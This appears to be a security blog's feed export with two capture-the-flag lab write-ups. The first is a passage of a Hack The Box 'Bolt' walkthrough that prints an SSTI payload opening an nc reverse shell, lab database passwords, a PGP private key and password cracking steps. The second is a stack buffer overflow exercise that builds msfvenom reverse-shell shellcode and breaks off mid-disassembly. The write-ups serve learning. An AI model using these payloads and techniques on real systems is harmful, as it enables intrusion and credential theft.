class="s1">'\x5f\x5fgetitem\x5f\x5f'</span><span class="o">)(</span><span class="s1">'\x5f\x5fbuiltins\x5f\x5f'</span><span class="o">)|</span><span class="nf">attr</span><span class="o">(</span><span class="s1">'\x5f\x5fgetitem\x5f\x5f'</span><span class="o">)(</span><span class="s1">'\x5f\x5fimport\x5f\x5f'</span><span class="o">)(</span><span class="s1">'os'</span><span class="o">)|</span><span class="nf">attr</span><span class="o">(</span><span class="s1">'popen'</span><span class="o">)(</span><span class="s1">'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.10.x.x 4444 &gt;/tmp/f'</span><span class="o">)|</span><span class="nf">attr</span><span class="o">(</span><span class="s1">'read'</span><span class="o">)()</span><span class="cp">}}</span> </code></pre></div> <p>Start a nc listener and then confirm the changes from the email and we get a reverse shell as www-data.</p> <h1 id="reverse-shell_1">Reverse Shell</h1> <p>In the /home directory, we have two users: eddie and clark, however we are unable to read these directories as www-data. Hopefully we have something on the box that will help us move into a user account.</p> <p>Some discoveries:</p> <ul> <li><code>netstat -l --numeric-ports</code> reveals we have a MySQL server running</li> <li><code>/var/www/demo.config.py</code> reveals a SQLALCHEMY URI of mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail</li> </ul> <p>We can access the database with:</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>mysql<span class="w"> </span>-u<span class="w"> </span>bolt_dba<span class="w"> </span>-p<span class="w"> </span>boltmail Enter<span class="w"> </span>password:<span class="w"> </span>dXUUHSW9vBpH5qRB </code></pre></div> <p>The only table in boltmail is user table and interestingly it just shows the hash for the admin user we discovered before and our test user so nothing new here.</p> <p>From our nmap scan, we know we have nginx running and we can find configuration files in /etc/nginx. There is also the passbolt app we had running on 443, the configuration filke says the root for this is <code>/usr/share/php/passbolt/webroot</code>. Inside of /bin I found a healthcheck. I executed it and it told me about a config/passbolt.php. Running <code>locate passbolt.php</code> shows we have a configuration file in /etc/passbolt. There is more database credentials here:</p> <div class="highlight"><pre><span></span><code><span class="x">'Datasources' =&gt; [</span> <span class="x"> 'default' =&gt; [</span> <span class="x"> 'host' =&gt; 'localhost',</span> <span class="x"> 'port' =&gt; '3306',</span> <span class="x"> 'username' =&gt; 'passbolt',</span> <span class="x"> 'password' =&gt; 'rT2;jW7&lt;eY8!dX8}pQ8%', </span> <span class="x"> 'database' =&gt; 'passboltdb',</span> <span class="x"> ],</span> <span class="x"> ]</span> </code></pre></div> <p>We can connect with <code>mysql -u passbolt -p passboltdb</code> like before. There are a lot more tables in this database. Both eddie@bolt.htb and clark@bolt.htb are listed in users but I did not find any hashes in the database. There is a secrets table here but the secret is encrypted with a password or phrase. Fortunately for us, eddie reuses this password for SSH and we can gain access that way.</p> <h1 id="eddie">eddie</h1> <p>First grab the user.txt flag in this home directory. A quick <code>sudo -l</code> check reveals we cannot run any sudo commands. I put LinPeas.sh onto the box and outputted the results to a file in order to read through more thoroughly</p> <p>Discoveries:</p> <ul> <li>Sudo Version 1.8.31</li> <li>/usr/sbin/dovecot (mail server) running as root</li> <li>Google Chrome seems to be running on the box, there is files in /home/eddie/.config/google-chrome<ul> <li>/home/eddie/.config/google-chrome/ZxcvbnData/1/passwords.txt</li> </ul> </li> <li>/usr/bin/gettext.sh and /usr/bin/amuFormat.sh</li> <li>/var/lib/php/sessions</li> <li>email in /var/mail/eddie</li> </ul> <p>If we <code>cat /var/mail/eddie</code> we get an email from Clark about the password management server. It says to download the extension to your browser and use a private key to recover the account.</p> <p>If we search in the Google Chrome directory for PRIVATE KEY, we can find references in a log file inside of an extension. I copied this text and put it into VS Code. Replace <code>\\r\\n</code> and then hit SHIFT + ENTER in the replace box to have an actual new line. Replace all for the PGP Key:</p> <div class="highlight"><pre><span></span><code><span class="gh">-----BEGIN PGP PRIVATE KEY BLOCK-----</span> <span class="na">Version</span><span class="o">:</span><span class="w"> </span><span class="s">OpenPGP.js v4.10.9</span> <span class="na">Comment</span><span class="o">:</span><span class="w"> </span><span class="s">https://openpgpjs.org</span> <span class="s">xcMGBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi</span> <span class="s">fjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk</span> <span class="s">cpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU</span> <span class="s">RNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU</span> <span class="s">+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a</span> <span class="s">If70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB</span> <span class="s">AAH+CQMINK+e85VtWtjguB8IR+AfuDbIzHyKKvMfGStRhZX5cdsUfv5znicW</span> <span class="s">UjeGmI+w7iQ+WYFlmjFN/Qd527qOFOZkm6TgDMUVubQFWpeDvhM4F3Y+Fhua</span> <span class="s">jS8nQauoC87vYCRGXLoCrzvM03IpepDgeKqVV5r71gthcc2C/Rsyqd0BYXXA</span> <span class="s">iOe++biDBB6v/pMzg0NHUmhmiPnSNfHSbABqaY3WzBMtisuUxOzuvwEIRdac</span> <span class="s">2eEUhzU4cS8s1QyLnKO8ubvD2D4yVk+ZAxd2rJhhleZDiASDrIDT9/G5FDVj</span> <span class="s">QY3ep7tx0RTE8k5BE03NrEZi6TTZVa7MrpIDjb7TLzAKxavtZZYOJkhsXaWf</span> <span class="s">DRe3Gtmo/npea7d7jDG2i1bn9AJfAdU0vkWrNqfAgY/r4j+ld8o0YCP+76K/</span> <span class="s">7wiZ3YYOBaVNiz6L1DD0B5GlKiAGf94YYdl3rfIiclZYpGYZJ9Zbh3y4rJd2</span> <span class="s">AZkM+9snQT9azCX/H2kVVryOUmTP+uu+p+e51z3mxxngp7AE0zHqrahugS49</span> <span class="s">tgkE6vc6G3nG5o50vra3H21kSvv1kUJkGJdtaMTlgMvGC2/dET8jmuKs0eHc</span> <span class="s">Uct0uWs8LwgrwCFIhuHDzrs2ETEdkRLWEZTfIvs861eD7n1KYbVEiGs4n2OP</span> <span class="s">yF1ROfZJlwFOw4rFnmW4Qtkq+1AYTMw1SaV9zbP8hyDMOUkSrtkxAHtT2hxj</span> <span class="s">XTAuhA2i5jQoA4MYkasczBZp88wyQLjTHt7ZZpbXrRUlxNJ3pNMSOr7K/b3e</span> <span class="s">IHcUU5wuVGzUXERSBROU5dAOcR+lNT+Be+T6aCeqDxQo37k6kY6Tl1+0uvMp</span> <span class="s">eqO3/sM0cM8nQSN6YpuGmnYmhGAgV/Pj5t+cl2McqnWJ3EsmZTFi37Lyz1CM</span> <span class="s">vjdUlrpzWDDCwA8VHN1QxSKv4z2+QmXSzR5FZGRpZSBKb2huc29uIDxlZGRp</span> <span class="s">ZUBib2x0Lmh0Yj7CwI0EEAEIACAFAmA4G2EGCwkHCAMCBBUICgIEFgIBAAIZ</span> <span class="s">AQIbAwIeAQAhCRAcJ0Gj3DtKvRYhBN9Ca8ekqK9Y5Q7aDhwnQaPcO0q9+Q0H</span> <span class="s">/R2ThWBN8roNk7hCWO6vUH8Da1oXyR5jsHTNZAileV5wYnN+egxf1Yk9/qXF</span> <span class="s">nyG1k/IImCGf9qmHwHe+EvoDCgYpvMAQB9Ce1nJ1CPqcv818WqRsQRdLnyba</span> <span class="s">qx5j2irDWkFQhFd3Q806pVUYtL3zgwpupLdxPH/Bj2CvTIdtYD454aDxNbNt</span> <span class="s">zc5gVIg7esI2dnTkNnFWoFZ3+j8hzFmS6lJvJ0GN+Nrd/gAOkhU8P2KcDz74</span> <span class="s">7WQQR3/eQa0m6QhOQY2q/VMgfteMejlHFoZCbu0IMkqwsAINmiiAc7H1qL3F</span> <span class="s">U3vUZKav7ctbWDpJU/ZJ++Q/bbQxeFPPkM+tZEyAn/fHwwYEYDgbYQEIAJpY</span> <span class="s">HMNw6lcxAWuZPXYz7FEyVjilWObqMaAael9B/Z40fVH29l7ZsWVFHVf7obW5</span> <span class="s">zNJUpTZHjTQV+HP0J8vPL35IG+usXKDqOKvnzQhGXwpnEtgMDLFJc2jw0I6M</span> <span class="s">KeFfplknPCV6uBlznf5q6KIm7YhHbbyuKczHb8BgspBaroMkQy5LHNYXw2FP</span> <span class="s">rOUeNkzYjHVuzsGAKZZzo4BMTh/H9ZV1ZKm7KuaeeE2x3vtEnZXx+aSX+Bn8</span> <span class="s">Ko+nUJZEn9wzHhJwcsRGV94pnihqwlJsCzeDRzHlLORF7i57n7rfWkzIW8P7</span> <span class="s">XrU7VF0xxZP83OxIWQ0dXd5pA1fN3LRFIegbhJcAEQEAAf4JAwizGF9kkXhP</span> <span class="s">leD/IYg69kTvFfuw7JHkqkQF3cBf3zoSykZzrWNW6Kx2CxFowDd/a3yB4moU</span> <span class="s">KP9sBvplPPBrSAQmqukQoH1iGmqWhGAckSS/WpaPSEOG3K5lcpt5EneFC64f</span> <span class="s">a6yNKT1Z649ihWOv+vpOEftJVjOvruyblhl5QMNUPnvGADHdjZ9SRmo+su67</span> <span class="s">JAKMm0cf1opW9x+CMMbZpK9m3QMyXtKyEkYP5w3EDMYdM83vExb0DvbUEVFH</span> <span class="s">kERD10SVfII2e43HFgU+wXwYR6cDSNaNFdwbybXQ0quQuUQtUwOH7t/Kz99+</span> <span class="s">Ja9e91nDa3oLabiqWqKnGPg+ky0oEbTKDQZ7Uy66tugaH3H7tEUXUbizA6cT</span> <span class="s">Gh4htPq0vh6EJGCPtnyntBdSryYPuwuLI5WrOKT+0eUWkMA5NzJwHbJMVAlB</span> <span class="s">GquB8QmrJA2QST4v+/xnMLFpKWtPVifHxV4zgaUF1CAQ67OpfK/YSW+nqong</span> <span class="s">cVwHHy2W6hVdr1U+fXq9XsGkPwoIJiRUC5DnCg1bYJobSJUxqXvRm+3Z1wXO</span> <span class="s">n0LJKVoiPuZr/C0gDkek/i+p864FeN6oHNxLVLffrhr77f2aMQ4hnSsJYzuz</span> <span class="s">4sOO1YdK7/88KWj2QwlgDoRhj26sqD8GA/PtvN0lvInYT93YRqa2e9o7gInT</span> <span class="s">4JoYntujlyG2oZPLZ7tafbSEK4WRHx3YQswkZeEyLAnSP6R2Lo2jptleIV8h</span> <span class="s">J6V/kusDdyek7yhT1dXVkZZQSeCUUcQXO4ocMQDcj6kDLW58tV/WQKJ3duRt</span> <span class="s">1VrD5poP49+OynR55rXtzi7skOM+0o2tcqy3JppM3egvYvXlpzXggC5b1NvS</span> <span class="s">UCUqIkrGQRr7VTk/jwkbFt1zuWp5s8zEGV7aXbNI4cSKDsowGuTFb7cBCDGU</span> <span class="s">Nsw+14+EGQp5TrvCwHYEGAEIAAkFAmA4G2ECGwwAIQkQHCdBo9w7Sr0WIQTf</span> <span class="s">QmvHpKivWOUO2g4cJ0Gj3DtKvf4dB/9CGuPrOfIaQtuP25S/RLVDl8XHvzPm</span> <span class="s">oRdF7iu8ULcA9gTxPn8DNbtdZEnFHHOANAHnIFGgYS4vj3Dj9Q3CEZSSVvwg</span> <span class="s">6599FMcw9nGzypVOgqgQv8JGmIUeCipD10k8nHW7m9YBfQB04y9wJw99WNw/</span> <span class="s">Ic3vdhZ6NvsmLzYI21dnWD287sPj2tKAuhI0AqCEkiRwb4Z4CSGgJ5TgGML8</span> <span class="s">11Izrkqamzpc6mKBGi213tYH6xel3nDJv5TKm3AGwXsAhJjJw+9K0MNARKCm</span> <span class="s">YZFGLdtA/qMajW4/+T3DJ79YwPQOtCrFyHiWoIOTWfs4UhiUJIE4dTSsT/W0</span> <span class="s">PSwYYWlAywj5</span> <span class="s">=cqxZ</span> <span class="gh">-----END PGP PRIVATE KEY BLOCK-----</span> </code></pre></div> <p>Now we can attempt to crack it with john</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>gpg2john<span class="w"> </span>pgpfile<span class="w"> </span>&gt;<span class="w"> </span>gpghash $<span class="w"> </span>john<span class="w"> </span>--wordlist<span class="o">=</span>/usr/share/wordlists/rockyou.txt<span class="w"> </span>--format<span class="o">=</span>gpg<span class="w"> </span>gpghash </code></pre></div> <p>After close to 12 minutes, the password is cracked as <code>merrychristmas</code>. Log back into the MySQL passboltdb again and let's checkout the secrets table. I copied the PGP message to my kali box and saved it as <code>pgp_msg</code>.</p> <p>Now run the following commands:</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>gpg<span class="w"> </span>--import<span class="w"> </span>pgpfile <span class="c1"># enter passcode of merrychristmas</span> $<span class="w"> </span>gpg<span class="w"> </span>-d<span class="w"> </span>pgp_msg <span class="c1"># enter passcode if prompted</span> </code></pre></div> <p>This gives us the following decrypted message:</p> <div class="highlight"><pre><span></span><code><span class="p">{</span><span class="nt">"password"</span><span class="p">:</span><span class="s2">"Z(2rmxsNW(Z?3=p/9s"</span><span class="p">,</span><span class="nt">"description"</span><span class="p">:</span><span class="s2">""</span><span class="p">}</span> </code></pre></div> <p>I tried to <code>su clark</code> with this password but it fails. However if we just run <code>su</code> to switch to root, the password does work!</p> <p>Let's grab the flag and we are done!</p>2021-08-13T17:04:19-04:002021-08-13T17:04:19-04:00Eric Turnertag:blog.ericturner.it,2021-08-13:/2021/08/13/hack-the-box-academy-buffer-overflow-on-linux-x86/

<p><img alt="" src="https://blog.ericturner.it/uploads/2021/08/image-95.webp"/></p> <p>While attempting a different reverse engineering / pwn challenge, I realized I needed more background knowledge on how to properly do a buffer overflow, thus I took the Stack-Based Buffer Overflows on Linux x86 case from HTB academy. This is my writeup of the final Skills Assessment</p> <h1 id="discovery">Discovery</h1> <p>First we need …</p>

<p><img alt="" src="https://blog.ericturner.it/uploads/2021/08/image-95.webp"/></p> <p>While attempting a different reverse engineering / pwn challenge, I realized I needed more background knowledge on how to properly do a buffer overflow, thus I took the Stack-Based Buffer Overflows on Linux x86 case from HTB academy. This is my writeup of the final Skills Assessment</p> <h1 id="discovery">Discovery</h1> <p>First we need to see what file we are working with, get some starting addresses, then start debugging to see if we have the ability to overflow into the <code>eip</code>.</p> <div class="highlight"><pre><span></span><code><span class="nx">htb</span><span class="o">-</span><span class="nx">student</span><span class="err">@</span><span class="nx">nixbof32skills</span><span class="p">:</span><span class="o">~</span><span class="err">$</span><span class="w"> </span><span class="nx">objdump</span><span class="w"> </span><span class="o">-</span><span class="nx">f</span><span class="w"> </span><span class="nx">leave_msg</span><span class="w"> </span> <span class="w"> </span><span class="nx">leave_msg</span><span class="p">:</span><span class="w"> </span><span class="nx">file</span><span class="w"> </span><span class="nx">format</span><span class="w"> </span><span class="nx">elf32</span><span class="o">-</span><span class="nx">i386</span> <span class="w"> </span><span class="nx">architecture</span><span class="p">:</span><span class="w"> </span><span class="nx">i386</span><span class="p">,</span><span class="w"> </span><span class="nx">flags</span><span class="w"> </span><span class="mh">0x00000150</span><span class="p">:</span> <span class="w"> </span><span class="nx">HAS_SYMS</span><span class="p">,</span><span class="w"> </span><span class="nx">DYNAMIC</span><span class="p">,</span><span class="w"> </span><span class="nx">D_PAGED</span> <span class="w"> </span><span class="nx">start</span><span class="w"> </span><span class="nx">address</span><span class="w"> </span><span class="mh">0x00000550</span> </code></pre></div> <p>First, we check to see what file format, architecture and starting address of the file are using <code>objdump -f</code>.</p> <p>If I try to disassemble with <code>objdump -d</code>, my terminal hangs when hitting the main function. Attempting to run this program either on its own or standalone causes an immediate segmentation fault. I find this a bit odd. I tried resetting the machine but it still does it, so it must be intended.</p> <p>I found we need to pass a parameter to the program and then it pastes it in <code>/home/htb-student/msg.txt</code>. Each time you run the program, it wipes the file and inserts the new message. </p> <h1 id="determining-buffer-overflow-vulnerability">Determining Buffer Overflow Vulnerability</h1> <p>Through some trial and error, I kept sending increasing amounts of <code>\x55</code> to the program. Between 2000 and 2100 nets us a segmentation fault. We can find the exact offset with some metasploit scripts.</p> <p>First I use /<code>pattern_create.rb</code> to give us a 2100 byte payload that we know will cause a segmentation fault:</p> <div class="highlight"><pre><span></span><code><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">share</span><span class="o">/</span><span class="n">metasploit</span><span class="o">-</span><span class="n">framework</span><span class="o">/</span><span class="n">tools</span><span class="o">/</span><span class="n">exploit</span><span class="o">/</span><span class="n">pattern_create</span><span class="o">.</span><span class="n">rb</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="mi">2100</span> </code></pre></div> <p>Next, back in <code>gdb</code> we can paste this in with python:</p> <div class="highlight"><pre><span></span><code>run<span class="w"> </span><span class="k">$(</span>python<span class="w"> </span>-c<span class="w"> </span><span class="s2">"print 'Aa0Aa1Aa2Aa3...6Cr7Cr8Cr9'"</span><span class="k">)</span> ... Program<span class="w"> </span>received<span class="w"> </span>signal<span class="w"> </span>SIGSEGV,<span class="w"> </span>Segmentation<span class="w"> </span>fault. 0x37714336<span class="w"> </span><span class="k">in</span><span class="w"> </span>??<span class="w"> </span><span class="o">()</span> </code></pre></div> <p>The program errors out and give us a unique hex code thanks to the pattern. Now we use this hexcode with another metasploit tool, <code>pattern_offset.rb</code> to get the exact number of characters needed to reach the <code>eip</code> register:</p> <div class="highlight"><pre><span></span><code>/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb<span class="w"> </span>-q<span class="w"> </span>0x37714336 <span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Exact<span class="w"> </span>match<span class="w"> </span>at<span class="w"> </span>offset<span class="w"> </span><span class="m">2060</span> </code></pre></div> <h1 id="taking-control-of-the-eip">Taking Control of the <code>eip</code></h1> <p>Voila! We now know it takes 2060 bytes to reach the eip. We can verify this with a special statement:</p> <div class="highlight"><pre><span></span><code><span class="n">run</span><span class="w"> </span><span class="o">$</span><span class="p">(</span><span class="n">python</span><span class="w"> </span><span class="o">-</span><span class="n">c</span><span class="w"> </span><span class="s2">"print '</span><span class="se">\x55</span><span class="s2">' * 2060 + '</span><span class="se">\x66</span><span class="s2">' * 4"</span><span class="p">)</span> <span class="o">...</span> <span class="n">Program</span><span class="w"> </span><span class="n">received</span><span class="w"> </span><span class="k">signal</span><span class="w"> </span><span class="n">SIGSEGV</span><span class="p">,</span><span class="w"> </span><span class="n">Segmentation</span><span class="w"> </span><span class="n">fault</span><span class="o">.</span> <span class="mh">0x66666666</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="err">??</span><span class="w"> </span><span class="p">()</span> </code></pre></div> <p>This statement fills the buffer with <code>\x55</code> bytes and then fills the <code>eip</code> with <code>\x66</code>. If we run <code>info registers</code> we can see this happening (trimmed for easy reading):</p> <div class="highlight"><pre><span></span><code><span class="p">(</span><span class="n">gdb</span><span class="p">)</span><span class="w"> </span><span class="n">info</span><span class="w"> </span><span class="n">registers</span> <span class="p">...</span> <span class="w"> </span><span class="n">ebx</span><span class="w"> </span><span class="mh">0</span><span class="n">x55555555</span><span class="w"> </span><span class="mh">1431655765</span> <span class="p">...</span> <span class="w"> </span><span class="n">ebp</span><span class="w"> </span><span class="mh">0</span><span class="n">x55555555</span><span class="w"> </span><span class="mh">0</span><span class="n">x55555555</span> <span class="p">...</span> <span class="w"> </span><span class="n">eip</span><span class="w"> </span><span class="mh">0</span><span class="n">x66666666</span><span class="w"> </span><span class="mh">0</span><span class="n">x66666666</span> <span class="p">...</span> </code></pre></div> <p>Now we know how to buffer overflow and take control of the <code>eip</code> to point to our own malicious address.</p> <h1 id="identify-initial-payload-length">Identify initial payload length</h1> <p>Now we need to generate a payload with msfvenom. I ran <code>uname -a</code> on our machine and we have an Ubuntu x86_64 linux machine.</p> <p>Now we can craft the payload:</p> <div class="highlight"><pre><span></span><code><span class="n">msfvenom</span><span class="w"> </span><span class="o">-</span><span class="n">p</span><span class="w"> </span><span class="n">linux</span><span class="o">/</span><span class="n">x86</span><span class="o">/</span><span class="n">shell_reverse_tcp</span><span class="w"> </span><span class="n">LHOST</span><span class="o">=&lt;</span><span class="n">ip</span><span class="o">&gt;</span><span class="w"> </span><span class="n">lport</span><span class="o">=</span><span class="mi">4444</span><span class="w"> </span><span class="o">--</span><span class="n">platform</span><span class="w"> </span><span class="n">linux</span><span class="w"> </span><span class="o">--</span><span class="n">format</span><span class="w"> </span><span class="n">c</span> <span class="o">...</span> <span class="n">Payload</span><span class="w"> </span><span class="n">size</span><span class="p">:</span><span class="w"> </span><span class="mi">74</span><span class="w"> </span><span class="n">bytes</span> <span class="o">...</span> </code></pre></div> <p>This tells us our payload is 74 bytes.</p> <p>Before we use our payload, we need to identify any bad characters the payload cannot have. We need to do some math to figure out exactly what to craft:</p> <div class="highlight"><pre><span></span><code> Buffer = "\x55" <span class="gs">* (2064 - 256 - 4) = 1804</span> <span class="gs"> CHARS = "\x00\x01\x02...\xfe\xff" # 256</span> <span class="gs"> EIP = "\x66" *</span> 4' </code></pre></div> <p>So our buffer gets 1800 bytes, our character string is 256 bytes, and our <code>eip</code> is 4 bytes.</p> <p>We will need to set a breakpoint so we can investigate the memory without the program crashing:</p> <div class="highlight"><pre><span></span><code><span class="p">(</span><span class="n">gdb</span><span class="p">)</span><span class="w"> </span><span class="n">disas</span><span class="w"> </span><span class="n">main</span> <span class="k">Dump</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">assembler</span><span class="w"> </span><span class="n">code</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="nl">main</span><span class="p">:</span> <span class="w"> </span><span class="mh">0x0000073b</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="mh">0x4</span><span class="p">(</span><span class="o">%</span><span class="n">esp</span><span class="p">),</span><span class="o">%</span><span class="n">ecx</span> <span class="w"> </span><span class="mh">0x0000073f</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="err">$</span><span class="mh">0xfffffff0</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x00000742</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">7</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">pushl</span><span class="w"> </span><span class="o">-</span><span class="mh">0x4</span><span class="p">(</span><span class="o">%</span><span class="n">ecx</span><span class="p">)</span> <span class="w"> </span><span class="mh">0x00000745</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">10</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="o">%</span><span class="n">ebp</span> <span class="w"> </span><span class="mh">0x00000746</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">11</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="o">%</span><span class="n">esp</span><span class="p">,</span><span class="o">%</span><span class="n">ebp</span> <span class="w"> </span><span class="mh">0x00000748</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">13</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="o">%</span><span class="n">esi</span> <span class="w"> </span><span class="mh">0x00000749</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">14</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="o">%</span><span class="n">ebx</span> <span class="w"> </span><span class="mh">0x0000074a</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">15</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="o">%</span><span class="n">ecx</span> <span class="w"> </span><span class="mh">0x0000074b</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">16</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">sub</span><span class="w"> </span><span class="err">$</span><span class="mh">0xc</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x0000074e</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">19</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x590</span><span class="w"> </span><span class="o">&lt;</span><span class="n">__x86</span><span class="p">.</span><span class="n">get_pc_thunk</span><span class="p">.</span><span class="n">bx</span><span class="o">&gt;</span> <span class="w"> </span><span class="mh">0x00000753</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">24</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="err">$</span><span class="mh">0x1869</span><span class="p">,</span><span class="o">%</span><span class="n">ebx</span> <span class="w"> </span><span class="mh">0x00000759</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">30</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="o">%</span><span class="n">ecx</span><span class="p">,</span><span class="o">%</span><span class="n">esi</span> <span class="w"> </span><span class="mh">0x0000075b</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">32</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">sub</span><span class="w"> </span><span class="err">$</span><span class="mh">0x4</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x0000075e</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">35</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="err">$</span><span class="mh">0x0</span> <span class="w"> </span><span class="mh">0x00000760</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">37</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="err">$</span><span class="mh">0x0</span> <span class="w"> </span><span class="mh">0x00000762</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">39</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="err">$</span><span class="mh">0x0</span> <span class="w"> </span><span class="mh">0x00000764</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">41</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x4b0</span><span class="w"> </span><span class="o">&lt;</span><span class="n">setresuid</span><span class="nv">@plt</span><span class="o">&gt;</span> <span class="w"> </span><span class="mh">0x00000769</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">46</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="err">$</span><span class="mh">0x10</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x0000076c</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">49</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="mh">0x4</span><span class="p">(</span><span class="o">%</span><span class="n">esi</span><span class="p">),</span><span class="o">%</span><span class="n">eax</span> <span class="w"> </span><span class="mh">0x0000076f</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">52</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="err">$</span><span class="mh">0x4</span><span class="p">,</span><span class="o">%</span><span class="n">eax</span> <span class="w"> </span><span class="mh">0x00000772</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">55</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="p">(</span><span class="o">%</span><span class="n">eax</span><span class="p">),</span><span class="o">%</span><span class="n">eax</span> <span class="w"> </span><span class="mh">0x00000774</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">57</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">sub</span><span class="w"> </span><span class="err">$</span><span class="mh">0xc</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x00000777</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">60</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="o">%</span><span class="n">eax</span> <span class="w"> </span><span class="mh">0x00000778</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">61</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x68d</span><span class="w"> </span><span class="o">&lt;</span><span class="n">leavemsg</span><span class="o">&gt;</span> <span class="w"> </span><span class="mh">0x0000077d</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">66</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="err">$</span><span class="mh">0x10</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x00000780</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">69</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">sub</span><span class="w"> </span><span class="err">$</span><span class="mh">0xc</span><span class="p">,</span><span class="o">%</span><span class="n">esp</span> <span class="w"> </span><span class="mh">0x00000783</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">72</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="o">-</span><span class="mh">0x175c</span><span class="p">(</span><span class="o">%</span><span class="n">ebx</span><span class="p">),</span><span class="o">%</span><span class="n">eax</span> <span class="w"> </span><span class="mh">0x00000789</span><span class="w"> </span><span 